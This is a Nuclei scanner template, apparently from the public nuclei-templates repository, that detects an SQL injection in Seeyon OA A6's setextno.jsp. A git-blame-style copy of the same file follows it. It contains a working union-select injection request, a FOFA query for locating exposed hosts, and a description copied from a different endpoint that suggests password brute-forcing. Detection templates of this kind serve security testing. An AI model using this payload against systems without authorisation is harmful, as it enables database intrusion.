nuclei-templates/http/vulnerabilities/seeyon/seeyon-oa-setextno-sqli.yaml

id: seeyon-oa-setextno-sqli

info:
  name: Seeyon OA A6 setextno.jsp - SQL Injection
  author: SleepingBag945
  severity: high
  description: |
    Seeyon OA A6 initDataAssess.jsp has leaked user sensitive information,You can blast the user password through the obtained username to enter the background for further attacks
  reference:
    - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
    - http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20A6%20setextno.jsp%20SQL注入漏洞.html
    - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20setextno.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="yyoa" && app="致远互联-OA"
  tags: seeyon,oa,sqli
variables:
  num: "999999999"

http:
  - raw:
      - |
        GET /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999)+union+all+select+1,2,(md5({{num}})),4# HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100805d589a7203364d749b859b35ddaf92688413649647afec08d7c80ffd56ef15022100ce909a61446a4f3e9c76f47795d9b6c70443970cf2fc834fc060aef153ce71b1:922c64590222798bb761d5b6d8e72950
Completed Assigned templates - DhiyaneshDK 2023-09-05 12:25:45 +00:00			`id: seeyon-oa-setextno-sqli`

			`info:`
			`name: Seeyon OA A6 setextno.jsp - SQL Injection`
			`author: SleepingBag945`
			`severity: high`
			`description: \|`
			`Seeyon OA A6 initDataAssess.jsp has leaked user sensitive information,You can blast the user password through the obtained username to enter the background for further attacks`
			`reference:`
			`- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java`
			`- http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20A6%20setextno.jsp%20SQL注入漏洞.html`
			`- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20setextno.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md`
			`metadata:`
templateman update 2023-10-14 11:27:55 +00:00			`verified: true`
Completed Assigned templates - DhiyaneshDK 2023-09-05 12:25:45 +00:00			`max-request: 1`
			`fofa-query: body="yyoa" && app="致远互联-OA"`
			`tags: seeyon,oa,sqli`
			`variables:`
			`num: "999999999"`

			`http:`
			`- raw:`
			`- \|`
			`GET /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999)+union+all+select+1,2,(md5({{num}})),4# HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '{{md5({{num}})}}'`

			`- type: status`
			`status:`
templateman update 2023-10-14 11:27:55 +00:00			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4b0a00483046022100805d589a7203364d749b859b35ddaf92688413649647afec08d7c80ffd56ef15022100ce909a61446a4f3e9c76f47795d9b6c70443970cf2fc834fc060aef153ce71b1:922c64590222798bb761d5b6d8e72950`